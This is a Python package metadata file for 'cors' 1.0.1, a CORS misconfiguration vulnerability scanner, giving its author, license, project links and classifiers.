Metadata-Version: 2.1
Name: cors
Version: 1.0.1
Summary: Fast CORS misconfiguration vulnerabilities scanner
Home-page: http://github.com/chenjj/CORScanner
Author: Jianjun Chen
Author-email: whucjj@hotmail.com
License: MIT
Project-URL: Bug Reports, https://github.com/chenjj/CORScanner/issues
Project-URL: Source, https://github.com/chenjj/CORScanner/
Platform: UNKNOWN
Classifier: Development Status :: 4 - Beta
Classifier: License :: OSI Approved :: MIT License
Classifier: Natural Language :: English
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python
Classifier: Environment :: Console
Classifier: Topic :: Security
